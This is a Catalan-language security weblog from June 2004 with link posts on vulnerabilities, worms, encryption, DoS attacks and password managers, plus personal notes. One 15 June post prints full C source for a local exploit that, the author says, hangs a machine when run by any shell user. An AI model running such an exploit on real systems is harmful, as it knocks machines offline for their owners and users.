A més, tal com indica Sánchez Almeida, els mitjans de comunicació contribueixen en gran mesura a donar una visió negativa i a magnificar l'impacte dels delictes informàtics: un parell d'exemples
Un ciutadà pot anar a presó per violar la llei de propietat intel·lectual però no per vulnerar el dret a la intimitat, molt més fonamental. Falsificar una targeta de crèdit té una pena de vuit a dotze anys de presó, mentre que distribuir pornografia infantil té una pena molt inferior.
I a partir de l'1 d'octubre, es podran perseguir els delictes contra la propietat intel·lecutal sense necessitat d'una denúncia prèvia.
|
19:22 (# Enllaç permanent) ()
|
|
RV10 és una llista amb les deu vulnerabilitats més importants (aquelles que suposen un major risc), generada de forma automàtica amb la informació més actualitzada. En aquests moments les vulnerabilitats són les següents:
| Nom |
 |
ID a CVE |
Microsoft IIS Malformed HTR Request Buffer Overflow Vulnerability |
|
| |
|
Apache Chunked-Encoding Memory Corruption Vulnerability |
|
| |
|
Microsoft Windows 2000 IIS WebDAV Buffer Overflow Vulnerability |
|
| |
|
Sendmail Address Prescan Possible Memory Corruption Vulnerability |
|
| |
|
Microsoft Windows DCOM RPC Interface Buffer Overrun Vulnerability |
|
| |
|
Microsoft Windows DCOM RPCSS Service Vulnerabilities |
|
| |
|
Microsoft Messenger Service Buffer Overrun Vulnerability |
|
| |
|
Microsoft Windows RPCSS Code Execution Variant Vulnerability |
|
| |
|
Microsoft Windows ASN.1 Library Integer Handling Vulnerability |
|
| |
|
Writeable SNMP Information |
No CVE assigned |
Addicionalment ofereixen la possibilitat de fer una prova per verificar l'existència d'alguna d'aquestes vulnerabilitats a una adreça IP (visible a Interent).
|
17:21 (# Enllaç permanent) ()
|
|
 Un sniffer és una eina bàsica tant per a la realització de proves de seguretat com per a l'anàlisi del funcionament d'una xarxa. Ethereal és segurament l'sniffer distribuït com a software lliure més potent que hi ha actualment.
D'altres sniffers com tpcdump o windump són molt útils per a estudiar paquets de forma individual, però Ethereal fa possible l'anàlisi de tot allò que circula per la xarxa.
El llibre comença amb un capítol d'introducció a l'anàlisi de xarxes on s'explica quin és el paper dels sniffers i com utilitzar-los (també fa referències als mètodes per a detectar l'existència d'un sniffer dins d'una xarxa). A continuació es mostren les característiques principals d'Ethereal, explicant la seva instal·lació, configuració i utilització dins de xarxes Ethernet.
A continuació s'explica com crear filtres, els altres programes associats a Ethereal (Tethereal, la versió en línia d'ordres, Editcap, mergecap i text2pcap), la integració d'Ethereal amb d'altres sniffers (Tcpdump, Snort, Snoop, el Microsoft Network Monitor i l'Sniffer de Network Associates).
A la tercera part es mostra com utilitzar Ethereal en situacions reals, com poden ser la detecció de cucs i troians dins de la xarxa.
La última part del llibre es dedica a com programar extensions per l'Ethereal (el llibre indica com col·laboradors als dos principals autors del programa).
Associat al llibre trobem un CD amb el codi font d'Ethereal i els executables per Windows, Solaris i Linux així com fitxers amb exemples de tràfic de xarxes.
Títol: Ethereal Packet Sniffing
Autor: Angela Orebaugh, amb la col·laboració de Greg Morris, Ed Warnicke i Gilbert Ramirez
Editorial Syngress
1a edició, febrer 2004
ISBN 1-932266-82-8
El llibre a Amazon.com i a Amazon.co.uk.
|
15:37 (# Enllaç permanent) ()
|
|
Tempest for Eliza és una aplicació per Linux que mostra com controlar les radiacions electromagnètiques que produeixen els monitors dels ordinadors i poden provocar interferències als receptors de ràdio. Amb Tempest for Eliza es pot fer que l'aparell de ràdio reprodueixi un MP3.
És, per tant, una mostra de fins a quin punt els equips informàtics produeixen radiacions electromagnètiques i com aquestes poden ser capturades per observar allò que està fent el PC.
La qualitat del MP3 reproduït no és equivalent a la que estem acostumats (una mostra)... però l'important és el fet que això es pugui realitzar
|
13:57 (# Enllaç permanent) ()
|
|
[Linux.com] Encrypting partitions using dm-crypt and the 2.6 series kernel
dm-crypt provides a crypto layer for Device-mapper. A Device-mapper driver allows you to define new partitions or logical volumes by specifying ranges of sectors on existing block devices. The ranges of sectors to be used by these partitions is mapped to targets according to a mapping table. dm-crypt provides just such a target which can be used to transparently encrypt a block device using the new 2.6 kernel cryptoAPI.
|
13:11 (# Enllaç permanent) ()
|
|
[Jon Udell] The Google PC generation analitza com la filosofia Google pot imposar canvis en la forma en que considerem els nostres ordinadors personals.
On the Google PC, you wouldn’t need third-party add-ons to index and search your local files, e-mail, and instant messages. It would just happen. The voracious spider wouldn’t stop there, though. The next piece of low-hanging fruit would be the Web pages you visit. These too would be stored, indexed, and made searchable. More ambitiously, the spider would record all your screen activity along with the underlying event streams. Even more ambitiously, it would record phone conversations, convert speech to text, and index that text. Although speech-to-text is a notoriously imperfect art, even imperfect results can support useful search.
|
11:12 (# Enllaç permanent) ()
|
|
|
dissabte, 19 / juny / 2004 |
TertuliaDigital organitza pel proper dia 29 de juny la «I Jornada sobre seguretat a la xarxa» a Barcelona. Es parlarà de signatura electrònica, seguretat a Internet, resposta i prevenció d'incidències de seguretat, gestió de la seguretat informàtica i seguretat i protecció de les dades. Totes aquestes sessions són gratuïtes, però cal inscriure's prèviament.
|
21:45 (# Enllaç permanent) ()
|
|
Fonts alternatives per a les sessions DOS de Windows. Són d'una mida diferent, que depenent de la pantalla (i l'ull de l'observador) poden ser més llegibles. He trobat dues col·leccions: aquesta i aquesta altra.
|
21:34 (# Enllaç permanent) ()
|
|
[Cio.com] All Hands on Tech explica totes les innovacions tecnològiques que hi ha al vaixell Queen Mary 2, com per exemple la utilització d'SmartCards.
|
15:05 (# Enllaç permanent) ()
|
|
[Techweb] IM Worms Could Spread In Seconds
Enterprises whose workers use one of the free public instant messaging networks -- the likes of America Online's, Yahoo's, or Microsoft's -- risk malicious attacks that could make the quick-spreading Sasser worm look like a worn-out snail, said a security analyst Friday.
"In instant messaging, we have a lot of the same security issues as in e-mail and networks," said Eric Chien, a senior researcher with Symantec's security response team. "Attacks can come in as attachments, there have already been some IM-related worms that send themselves to people on your buddy list, and IM lacks encryption."
Public IM services such as those hosted by AOL, Yahoo, and Microsoft are extremely popular in the workplace. According to a recent study by the Ridicati Group, by year-end 2008, a whopping 88 percent of enterprise IM users will rely on a public network.
Per solucionar el problema de la manca de xifrat, es pot utilitzar el SimpLite.
|
13:03 (# Enllaç permanent) ()
|
|
Mind Those Passwords? és un interessant article de MSDN que explica com emmagatzemar de forma segura totes les contrasenyes que habitualment fem servir, de forma que només es calgui recordar una contrasenya mestra (la que fem servir per accedir al magatzem de contrasenyes).
Aquest és un aspecte que cada vegada agafarà més importància, a mesura que es van complicant cada vegada més les polítiques de contrasenyes. Si fa uns mesos, podíem crear contrasenyes que eren fàcils de recordar, avui en dia cada vegada és més difícil (necessitat de combinar majúscules i minúscules, presència de nombres i caràcters especials, obligació en la rotació sense possibilitat de repetir).
A l'article es comenta un petit programet, Password Minder, que fa servir els serveis criptogràfics de .NET per emmagatzemar les contrasenyes.
Una alternativa lliure és el programa Password Safe, que manté Bruce Schneier (actualment disponible únicament per Windows). La informació l'emmagatzema en una base de dades propietària, xifrada amb l'algoritme Blowfish i el mecanisme de xifrat ha estat revisat per Counterpane.
Una altra alternativa (la que jo personalment faig servir) és SplashID (disponible per a PalmOS i PocketPC, a més d'una aplicació Windows per a l'escriptori). També xifra la informació amb Blowfish i té l'avantatge de que permet portar les contrasenyes a tot arreu on sóc ja que les porto emmagatzemades al Treo (bé... funciona en virtualment qualsevol PDA modern).
Jo personalment cada vegada començo a emmagatzemar més informació: les múltiples contrasenyes que haig de fer servir a diari, les combinacions d'alarmes, els usuari i contrasenyes d'accés a determinades pàgines web...
|
11:08 (# Enllaç permanent) ()
|
|
|
divendres, 18 / juny / 2004 |
Ja tinc ganes d'anar a veure la tercera pel·lícula de la sèrie Harry Potter.
Per cert, m'imagino que per a la propera pel·lícula (d'aquí a dos anys?) hauran de plantejar-se un canvi d'actors... ja no semblaran pas uns adolescents!
|
21:31 (# Enllaç permanent) ()
|
|
 Uns quants anys després de la mort de Frank Herbert, el seu fill Brian i Kevin J. Anderson, van començar una nova sèrie de novel·les al voltant de l'univers del planeta més sec de l'univers (i on es troba la substància més meravellosa, l'espècia melange... un element bàsic per als viatges interestel·lars). A totes les novel·les de la família «Dune» tenim diverses històries de conspiracions, batalles, rivalitats entre planetes i famílies... tot enllaçat sovint d'una forma magistral.
A les novel·les originalment escrites per Frank Herbet, el nou duet va prendre la història explicant els orígens, amb la trilogia formada per «Dune. La família Atreides», «Dune. La família Harkonnen» i «Dune. La família Corrino». Ara encara van més enllà i han començat una segona trilogia, que s'inicia amb «Dune. La Yihad Butleriana». Situada temporalment 10.000 anys abans de la història explicada a la novel·la que va iniciar tota la història, explica la situació existent en plena batalla entre la humanitat lliure (o semi-lliure, ja que existia l'esclavitud d'éssers humans per part d'altres éssers humans) que formen els planetes de la Lliga. A l'altra costat tenim els planetes controlats per les màquines pensats, els planetes sincronitzats.
Aquest llibre no passarà pas a la història de la ciència ficció, però no deixa de ser un llibre entretingut, que explica un moment fascinant de l'univers «Dune», amb molta acció i moltes revelacions realment fascinants... per exemple, no deixa de ser curiós que un Atreides sigui essencialment un dimoni mentre que un Harkonnen és un dels principals defensors de la humanitat lliure.
|
21:15 (# Enllaç permanent) ()
|
|
[Security Devcenter] Filtering IDS Packets
Anyone who has worked with an intrusion detection system knows that it can produce an enormous amount of data. For many network security analysts this vast ocean of packets flagged for further inspection quickly becomes an unruly beast to tame. How then to tame the beast?
|
20:49 (# Enllaç permanent) ()
|
|
Palm Webcam, un controlador per Windows (2000 i XP) que permet utilitzar la càmara integrada del Treo 600 com a webcam.
|
19:44 (# Enllaç permanent) ()
|
|
[MSDN TV] Security in WSE 2.0
Celebrating the launch of the Web Service Enhancements (WSE) 2.0 at Tech·Ed 2004, Benjamin Mitchell and John Bristowe talk about the advanced XML Web service specifications that it supports, focusing on WS-Security. They demonstrate how WSE provides a simple object model that allows developers to secure Web services independent of the transport using only a few lines of code.
|
18:14 (# Enllaç permanent) ()
|
|
He descobert que moltes pàgines antigues del weblog estaven desmadrades, com conseqüència d'un error en un dels scripts que executo diàriament. Estic restaurant la còpia de seguretat. No crec haver perdut res, però algunes pàgines antigues (i no tant antigues) estaven totalment desmadrades.
Cosses que passen.
|
17:42 (# Enllaç permanent) ()
|
|
|
dijous, 17 / juny / 2004 |
[News.com] Asleep at the wheel? és un excel·lent article sobre la situació del món de la seguretat informàtica. L'auto-confiança i alguns pocs sistemes de protecció no poden fer front a totes les demandes de seguretat.
Modern hacks aren't quite so obvious. Remember the old "Three Stooges" skits when the boys would knock out some guards, dress up in their uniforms and then skip freely past a watchman? That's kind of how it works.
Hackers look for a place with a lot of traffic; a university or an Internet service provider network with many unaffiliated users is perfect. The hacker compromises every system in this high-traffic network by attacking well-known vulnerabilities. This brings in the booty: PCs with virtual private network (VPN) connections to corporate networks. Don't look now, but Larry, Curly and Moe have taken out your security staff and are about to come through the door!
With a VPN connection at hand, the hacker simply enters the network, compromises one internal system after another--and then steals your customer information, credit card numbers or source code. Worst of all, you have no idea that anything is wrong until the barrage of phone calls comes in from irate customers, banks and business partners. Better pour some coffee and call your attorneys; it's going to be a long night.
|
23:55 (# Enllaç permanent) ()
|
|
[Reuters] Microsoft on Track to Offer Anti-Virus Software
Mike Nash, chief of Microsoft's security business unit, told reporters that Microsoft is developing software to protect personal computers running Windows against malicious software, the worms and viruses that have plagued users with data loss, shutdowns and disruptions in Web traffic in recent years
|
23:40 (# Enllaç permanent) ()
|
|
Una característica de Windows Server 2003, que ràpidament es converteix en una prestació odiosa, és que en la configuració per defecte t'obliga a escriure el motiu pel qual fas un shutdown.
Cansat de ficar motius del tipus «aaaa» o «em dóna la gana», que no és el que es pot esperar un professional... :-) he acudit a la meva font de resolució de problemes (Google) per mirar com desactivar això.
Hi ha dues formes. La primera és editant el registre HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\
Windows NT\Reliability
És possible que calgui crear la clau Reliability. Cal editar-lo per tal que el contingut sigui: Tipus: DWORD
Nom valor: ShutdownReasonOn
Valor: 0
L'altra sistema és utilitzar la política de grup:
- Entrar a l'editor de polítiques (Executar gpedit.msc)
- Expandir Computer Configuration -> Administrative Templates -> System
- Fer doble clic damunt de Display Shtutdown Event Tracker
- Marcar l'opció Disabled i OK.
- Tancar l'editor de polítiques
Per cert, aquest registre de les aturades també es pot activar a Windows XP modificant el valor indicat anteriorment del registre per tal que sigui 1.
|
21:49 (# Enllaç permanent) ()
|
|
[Linux Security] Tackling Unix security in large organisations. Article en dues parts sobre la gestió de la seguretat dels entorns Unix dins de grans organitzacions.
|
15:21 (# Enllaç permanent) ()
|
|
[Computerworld] Six ways to justify security training
A few days ago, a reader asked if I could help him justify the cost of security training that he and his fellow Unix system administrators felt they needed.
I gave the reader a variety of ideas, one of which is sure to resonate with his manager. When making your pitch, you might want to try these reasons.
|
15:18 (# Enllaç permanent) ()
|
|
[Via Pjorge] el bilingüisme (entenent com a tal la utilització a diari de dues llengües des de l'edat dels deu anys) ajuda a mantenir-se mentalment més jove.
All of the bilinguals in the study had used their two languages everyday since they were 10 years old, and researchers say that the life-long experience of managing two languages may prevent some of the negative effects of aging on processing of distracting information.
|
15:08 (# Enllaç permanent) ()
|
|
|
dimecres, 16 / juny / 2004 |
 El prestigiós setmanari d'informació general, Time, dedica un extens reportatge, en la seva edició del 21 de juny, al món dels weblogs: Meet Joe Blog explicant les experiències d'alguns webloggers:
Gross, Malda and Dutton aren't rich or famous or even conspicuously good-looking. What they have in common is that they all edit blogs: amateur websites that provide news, information and, above all, opinions to rapidly growing and devoted audiences drawn by nothing more than a shared interest or two and the sheer magnetism of the editor's personality. Over the past five years, blogs have gone from an obscure and, frankly, somewhat nerdy fad to a genuine alternative to mainstream news outlets, a shadow media empire that is rivaling networks and newspapers in power and influence.
Scobleizer aprofita això per inventar-se una entrevista sobre les seves motivacions per mantenir el seu weblog... una entrevista amb unes preguntes que cap periodista hauria de fer mai.
|
21:54 (# Enllaç permanent) ()
|
|
[Security Pipeline] Web Services Are Biggest Security Challenge recull una sèrie de declaracions de Whitfield Diffie (màxim responsable de seguretat a Sun i co-inventor de la criptografia de clau pública) sobre els reptes de seguretat del futur.
Web services are the major challenge for network security in the 21st Century, because they require users to routinely run code and data on machines that the users don't control, said Whitfield Diffie, chief security officer for Sun Microsystems.
(...)
"I believe that within a decade, it will become true that a typical program, without human effort, will go out on the network and look for resources wherever they are avalable," Diffie said.
What kind of resources will programs look for? They could be secret algorithms, like Google's highly guarded search algorithms, or a great deal of computing power, or a great deal of proprietary information, such as the databases at Mead Data, which publishes the NexisLexis compilation of newspaper and magazine articles, Diffie said.
|
21:31 (# Enllaç permanent) ()
|
|
[SecurityFocus] Wireless Attacks and Penetration Testing Segona part (d'un total de tres) d'una sèrie d'articles sobre la realització de proves de penetració a les xarxes sense fils. En aquest article s'explica com obtenir la clau utilitzada pel xifrat WEP, la realització d'escaneig de ports i la identificació d'elements vulnerables. A la primera part es van explicar els diversos tipus d'atac.
|
07:37 (# Enllaç permanent) ()
|
|
|
dimarts, 15 / juny / 2004 |
[Crypto-Gram] Microsoft Source Code Leak. Bruce Schneier analitza la resposta de Microsoft davant la divulgació de part del codi font de Windows NT.
The Windows NT code that was leaked consisted of all of NT 4.0 Service Pack 3 -- more than 27,000 files. The Windows 2000 code only contained select portions of the source code, but did include the PKI module.
(...)
A company that truly understands data security would respond by admitting and trying to fix the security breach that caused the leak, and by proactively poring over the released code to quickly patch as many of the inevitable bugs as possible. They would realize that the hackers have the code and might use it, and not prevent the good guys from helping defend themselves.
|
23:19 (# Enllaç permanent) ()
|
|
[Slashdot] Akamai DNS Outage Messes up Net... i és que avui en dia, si Akamai deixa de funcionar ens quedem sense Google, Microsoft, Yahoo!, Apple, les eleccions europees (bé, vist l'èxit d'aquestes no cal que Akamai deixi de funcionar). Ho expliquen a Incidents.org:
Starting at around 8:30 am EDT (12:30 UTC), a number of sources started to report a widespread Akamai DNS issue. Large web sites, which use Akamai for its DNS service, did no longer resolve. Affected sites were Yahoo, Google, Microsoft, Fedex, Xerox, Apple and likely many others.
Akamai és una empresa que ofereix serveis de balanceig del tràfic i localització geogràfica, adreçat a empreses amb una notable presència a Internet, permetent la distribució de contingut de forma distribuïda arreu del món. Akamai afirma que els seus servidors gestionen un 15% del tràfic global d'Internet.
A Netcraft indiquen, citant fonts de l'empresa, que l'origen del problema ha estat un atac distribuït de denegació de servei contra els seus servidors de noms.
Entre els serveis afectats en destaca els serveis d'actualització de diversos programes antivirus (com Symantec i Trendmicro).
Molts dels afectats pel problema han pogut restaurar el servei en poca estona, canviant els servidors de noms associats als dominis amb màquines de la seva pròpia infraestructura.
|
22:58 (# Enllaç permanent) ()
|
|
Aquest exploit penjarà la màquina. Ha de ser executat per un usuari local amb accés via shell. No cal ser root.#include <'sys/time.h'>
#include <'signal.h'>
#include <'unistd.h'>
static void Handler(int ignore)
{
char fpubuf[108];
__asm__ __volatile__ ("fsave %0 " : : "m"(fpubuf));
write(2, "*", 1);
__asm__ __volatile__ ("frstor %0 " : : "m"(fpubuf));
}
int main(int argc, char *argv[])
{
struct itimerval spec;
signal(SIGALRM, Handler);
spec.it_interval.tv_sec=0;
spec.it_interval.tv_usec=100;
spec.it_value.tv_sec=0;
spec.it_value.tv_usec=100;
setitimer(ITIMER_REAL, &spec, NULL);
while(1)
write(1, ".", 1);
return 0;
}
|
07:55 (# Enllaç permanent) ()
|
|
[The Register] Backdoor program gets backdoored. Com dèia en Morpheus, «el destí, sembla que no està carent de certa ironia».
The author of a free Trojan horse program favored by amateur computer intruders found himself with some explaining to do to the underground last month, after his users discovered he'd slipped a secret backdoor password into his popular malware, potentially allowing him to re-hack compromised hosts.
The program in question is Optix Pro (Backdoor.OptixPro.12), a full-featured backdoor that allows an intruder to easily control a compromised Windows machine remotely, from accessing or changing files, to capturing a user's keystrokes or spying on a victim through their webcam. Though some features could make Optix Pro usable as a legitimate remote management tool, others are clearly tailored to the underground, including a function that disables a machine's anti-virus and firewall software. The program has been downloaded nearly 270,000 times, according to a counter on the distribution site.
|
07:37 (# Enllaç permanent) ()
|
|
Microsoft explica com ha implementat la separació de dominis utilitzant IPSec:
Situation
As part of its “defense in depth” security strategy, Microsoft IT wanted to isolate their managed computers from unmanaged (and untrusted) computers. If trusted computers could be made to ignore requests from these untrusted computers, they could be kept more secure.
Solution
Microsoft IT chose IP Security (IPsec), a standards-based approach to authenticating network traffic. With IPsec, the corporate domains can be isolated, segmenting all computers into trusted and untrusted groups.
Benefits
• Allows creation of logical secure network segments behind the corporate network perimeter.
• Works independently of network hardware, computers, and other infrastructure, providing end-to-end security to the edges of the network.
• Can be deployed and managed centrally through the use of Group Policy.
Products & Technologies
• IP Security protocols (ESP, IKE)
• Windows Server 2003
• Windows XP Professional (SP 1)
• Windows 2000 (SP3)
• Group Policy
• Active Directory
• Public Key Infrastructure and Certificate Authority (CA)
|
01:03 (# Enllaç permanent) ()
|
|
[The New York Times] Gambling on Voting és una fantàstica comparativa dels requeriments de seguretat, fiabilitat i fortalesa davant el frau que imposa el govern dels Estats Units a les màquines escurabutxaques i a les màquines utilitzades per a les votacions electròniques. Quins requeriments seran els més exigents?
|
00:35 (# Enllaç permanent) ()
|
|
|
dilluns, 14 / juny / 2004 |
[Windows .NET Magazine] Second Windows XP SP2 Release Candidate Is Imminent. És possible durant aquest setmana Microsoft publiqui una segona beta del Service Pack 2 per Windows XP.
Sources tell me that Microsoft is already deploying XP SP2 RC2 internally and that the company gave beta testers the code late last week. However, a recent spate of "extremely critical" flaws in Microsoft Internet Explorer (IE) 6--which also affect the supposedly ultra-secure IE version in XP SP2--might ultimately push back XP SP2 RC2 yet again. If that happens, the delay would be the third major postponement of this product.
|
23:48 (# Enllaç permanent) ()
|
|
[Slashdot] Happy Birthday, UNIVAC I. Avui fa cinquanta tres anys, l'UNIVAC I va ser oficialment lliurat a l'oficina del cens dels Estats Units. Amb un pes superior als set mil quilos, unes cinc mil làmpades i la capacitat de fer mil operacions per segon, va ser el primer ordinador comercial.
|
23:43 (# Enllaç permanent) ()
|
|
[Kaspersky Labs] Virus moves to mobile phones
Kaspersky Labs detects Cabir, the first network worm for mobile phones.
Kaspersky Labs, a leading information security software developer, has detected Cabir, the first network worm which propagates via mobile networks. It infects telephones running Symbian OS. So far, Cabir does not seem to have caused any security incidents.
(...)
Analsysis of the worm's code has not so far detected any malicious payload.
|
22:49 (# Enllaç permanent) ()
|
|
[Barrapunto] Crackean el sitio web del PSOE para las elecciones
El sitio de el PSOE para las elecciones europeas le han hecho un "deface" para protestar contra la SGAE, las patentes de software, ETA y los gobiernos españoles. También han modificado la imagen de Josep Borrell haciéndola irreconocible. Aquí podéis ver el estado en el que quedo la web.
|
07:59 (# Enllaç permanent) ()
|
|
[Infosec Writers] Application Level DoS Attacks tracta sobre les tendències en els atacs de denegació de servei. L'objectiu d'un atac DoS (Denial of Service) és aturar els serveis de xarxa i van des de la simple saturació de l'ample de banda, passant per aquells que s'aprofiten de vulnerabilitats al software fins als atacs més complexos que, de forma distribuïda, contra aplicacions a mida. Aquesta mena d'atacs no són pas nous i s'han utilitzat amb efectes devastadors per evitar l'accés a les webs d'empreses com eBay, Microsoft, la RIAA, SCO i moltíssimes d'altres empreses.
No obstant, els atacants encara no han utilitzat totes les vulnerabilitats habitualment presents en la majoria de serveis online --en particular els atacs dirigits contra les capes d'aplicació i de processament de dades. Segurament aquesta serà una tendència que veurem augmentar en els propers anys.
|
07:58 (# Enllaç permanent) ()
|
|
 InfoGuardian de Kontron és un disc dur extern (USB 2.0 o FireWire) que xifra automàticament tot el contingut, utilitzant els algoritmes DES o TripleDES emmagatzemant la clau de xifrat dins d'una memòria USB.
Els dubtes són de rendiment... en la mesura que tot el que passa amb origen o destinació el disc ha de ser xifrat, el coll d'ampolla pot ser important.
Tampoc no tinc ni idea del seu preu.
|
00:15 (# Enllaç permanent) ()
|
|
|
diumenge, 13 / juny / 2004 |
[Somiatruites] El spam y la mafia, un asunto serio
Casi el 60% de los correos que corren por las entrañas de Internet son basura.
(...)
La mafia neoyorquina está metida de lleno, y cada vez más bandas criminales rusas sacan tajada de este negocio.
(...)
b Los operadores de telefonía móvil parecen bastante preocupados por el efecto negativo que el spam pueda causar en sus potenciales usuarios. ¿Quién va a contratar un sevricio de correo electectrónico para su teléfono móvil si resulta que seis de cada diez correos que va a recibir en él son basura?
|
23:43 (# Enllaç permanent) ()
|
|
A mitjans d'abril vaig veure que a la web de Microsoft es podia demanar gratuïtament l'anomenat «CDROM Security Guidance Kit». Fa un parell de setmanes el vaig rebre (enviat per UPS, per cert) però fins avui no l'he pogut mirar.
En realitat no és un CD, sinó un DVD anomenat «MS Security DVD» que inclou quatre sessions pràctiques. En començar surt això:
que com a mínim fa dubtar de quin és el contingut del DVD.
Les àrees que inclou són:
- Essentials of Application Security
- Writing Secure Code - Threat Defense
- Writing Secure Code - Best Practices
- Implementing Application Security Using .NET
- Microsoft Java VM
Un cop entrem dins d'una àrea continua el «show»
I després d'això, ja s'ha acabat el pressupost pugílistic... Dins de les àrees hi ha diverses lliçons... i cada lliçó no es cap altra cosa que una típica lliçó on per una banda tenim les presentacions i a l'altra un vídeo on s'explica.
Per últim el DVD permet inscriure's al concurs aquell que organitza Microsoft a Amsterdam a finals d'aquest mes.
|
17:35 (# Enllaç permanent) ()
|
|
Strike that out, Sam... una anàlisi dels documents publicats per Microsoft dins de la iniciativa "Get The Facts on Windows and Linux", on es compara Linux amb Windows. Els documents Word contenen metadades ocultes que permeten veure algunes coses esborrades dels documents.
No hi ha cap revelació espectacular, però si molt text canviat: frases esborrades, cites eliminades, canvi en el nom de les persones que s'associen a una cita... Una bona mostra de per quina raó mai s'han de publicar documents Word directament a Internet.
Un altre article sobre aquest tema, recentment publicat és Information Leakage Caused by Hidden Data in Published Documents a la revista de seguretat de la IEEE Computer Society
|
16:57 (# Enllaç permanent) ()
|
|
[TreoCentral] Again, How fast if your Treo? A TreoCentral es proposa que els usuaris de telèfons Treo facin una prova per verificar la velocitat del seu enllaç a Internet des del mòbil, consistent en mesurar quan es triga en baixar 100 KB. El Treo 600 pot connectar a Internet via GPRS (el model GSM) o bé fent servir la xarxa propietària d'Sprint.
Sprint ofereix una major velocitat de connexió, de l'ordre de 100 kbps. Les xarxes GPRS són notablement més lentes. En el meu cas que faig servir Movistar Empresas (no la xarxa que voldria... però es que em paguen la línia) arribo als 39 kbit/sec. Malgrat no ser res de l'altra món, m'ha sorprès que és una de les connexions més ràpides dins les xarxes GPRS.
|
12:59 (# Enllaç permanent) ()
|
|
[BigAdmin de Sun] Backup and Recovery Utilities for the Solaris OS. Es pot aplicar un complet sistema de còpies de seguretat amb les eines incloses al sistema operatiu (tar, dd, cpio i pax).
De totes formes, en la realització de còpies de seguretat integrals, jo trobo més pràctic fer servir ufsdump/ufsrestore.
|
12:51 (# Enllaç permanent) ()
|
|
[Hispasec] El gusano Zafi.B aumenta su propagación en las últimas horas
Según las estadísticas de VirusTotal, el gusano Zafi.B, también denominado Erkez.B, ha obtenido un aumento significativo en su propagación durante las últimas 24 horas. Zafi.B busca antivirus y firewalls en los sistemas y sobrescribe sus ejecutables con una copia del gusano.
(...)
Su principal vía de distribución es el correo electrónico, si bien también se copia en todas las carpetas del sistema infectado cuyos nombres contengan las palabras "share" o "upload", que pueden pertenecer a los directorios de archivos compartidos de algunas aplicaciones P2P. Los nombres que utiliza para intentar propagarse en las redes P2P son "winamp 7.0 full_install.exe" y "Total Commander 7.0 full_install.exe".
|
12:28 (# Enllaç permanent) ()
|
|
|
dissabte, 12 / juny / 2004 |
[Internetnews.com] The Internet: 'A Dirty Mess'. Bruce Sterling dóna la seva opinió sobre la salut d'Internet i la gent que se n'aprofita:
The digital revolution has degenerated into an underworld of organized crime, dirty tactics, black ops and terrorism, said science fiction writer and cyberpunk pioneer Bruce Sterling Tuesday.
Keynoting a morning session of Gartner's 10th Annual IT Security Summit here, Sterling said, "This is the birth of a genuine, no kidding, for-profit, electronic, multi-national criminal world. The global criminal world of oil, narcotics and guns now has broadband."
And, according to Sterling, they are fully utilizing the technology.
"These are not all old-school hackers. This is organized crime activity. They are profit driven," he said. "These are crooks. The crooks that in the future that are going to elbow the hobbyist kids aside and settle in for a nice, long vampire slurp from our e-commerce."
|
22:42 (# Enllaç permanent) ()
|
|
[Infosec Writers] IT Security Event Management tracta sobre la importància de la centralització dels esdeveniments de seguretat. Aquest document discuteix quines són les eines, tecnologies i serveis que són necessaris per tal que els encarregats de l'operació de la seguretat puguin gestionar els dispositius i la infraestructura, aplicacions i transaccions, d'una forma eficient i eliminant els possibles falsos positius.
|
22:30 (# Enllaç permanent) ()
|
|
 Gràcies a la invitació d'un amic, des d'avui tinc compte de correu a Gmail. Si bé inicialment li he dit que no, ràpidament m'ho he repensat: pot ser útil com magatzem de documents i programes... ja que la seva mida dóna per tenir bastant cosa sempre a l'abast.
He estat aquesta tarda mirant-lo una miqueta per damunt. La interfície la trobo una mica pesada i lenta, però és utilitzable. És curiós que no permeti la creació de carpetes (ho justifiquen en la potència del motor de cerca).
No crec que el faci servir com a correu habitual i espero que aquest no estigui farcit de correu brossa com els altres webmails (especialment Yahoo!) que fins ara tenia.
|
20:51 (# Enllaç permanent) ()
|
|
 Quan vaig registrar el Treo em van donar l'oportunitat de baixar-me una versió registrada del Poket Tunes, un reproductor MP3 per dispositius Palm OS versió 5. Fins avui no l'he provat... i no està malament; fa gràcia això de fer servir el telèfon per escoltar MP3... no crec que vagi mai pel carrer escoltant música, però com a curiositat no està pas malament.
|
16:27 (# Enllaç permanent) ()
|
|
Digue'ls-hi moderats...
En el capítol dels danys materials, Plaza Hotels quantifica en 3.884,94 euros les destrosses produïdes durant una festa nocturna (de la gent de «El Terrat») a l'Hotel Crowl Plaza (d'Andorra).
Diari Avui
Que van fer per provocar unes destroses de més de mig milió de pessetes?
|
15:47 (# Enllaç permanent) ()
|
|
La novena edició, corresponent a l'any 2004, de l'enquesta sobre seguretat informàtica que anualment fan el CSI (Computer Security Institute) i l'FBI, ja està disponible (cal registrar-se prèviament). A primer cop d'ull aquestes són les dades més destacades:
- L'ús no autoritzat d'ordinadors va a la baixa.
- L'impacte econòmic de les incidències de seguretat també s'ha reduït.
- Per primera vegada, el delicte informàtic amb major impacte econòmic són les denegacions de servei.
- El nombre d'organitzacions que denuncien a la policia/jutjat les incidències de seguretat també va a la baixa. El principal motiu d'evitar la denúncia és evitar la mala publicitat.
- La majoria d'organitzacions apliquen criteris d'avaluació econòmica de les seves inversions en seguretat. Un 55% fan servir estudis de retorn d'inversió (ROI, Return of Investment), un 28% estudis de retorn intern (IRR, Internet Rate of Return) i un 25% el valor present net (NPV, Net Present Value).
- El 80% de les organitzacions fan auditories de seguretat.
- La majoria d'organitzacions no externalitzen les activitats de seguretat... i les que ho fan, el percentatge d'activitats és molt baix.
- Per gairebé totes les organitzacions, la formació en conscienciació de seguretat és important, però consideren que la inversió encara no es suficient.
Aquesta enquesta és quelcom que qualsevol persona involucrada en la seguretat ha de llegir.
|
12:56 (# Enllaç permanent) ()
|
|
|
divendres, 11 / juny / 2004 |
[SecurityFocus] TCP/IP Skills for Security Analysts. Segona part d'una sèrie de dos articles. A la primera part es parlava dels coneixements que havia de tenir un professional de la seguretat per tal de poder ser considerar qualificat per a la feina. En aquesta segona part es tracta sobre la utilització pràctica d'aquests coneixements en una situació «real».
|
07:29 (# Enllaç permanent) ()
|
|
[Netcraft] New Attack Compromises Fully-Patched IE Browsers recull el mateix que ja vaig comentar ahir sobre els atacs aprofitant-se d'un 0-day de l'Internet Explorer.
A new security hole in Internet Explorer exploit allows hackers to gain control of a user's computer when they click on a hyperlink, even while using a fully-patched version of IE6. An exploit using the technique, which employs a complex series of Javascript, VBScript and PHP code, has been published on the Web and is being discussed in several security mailing lists.
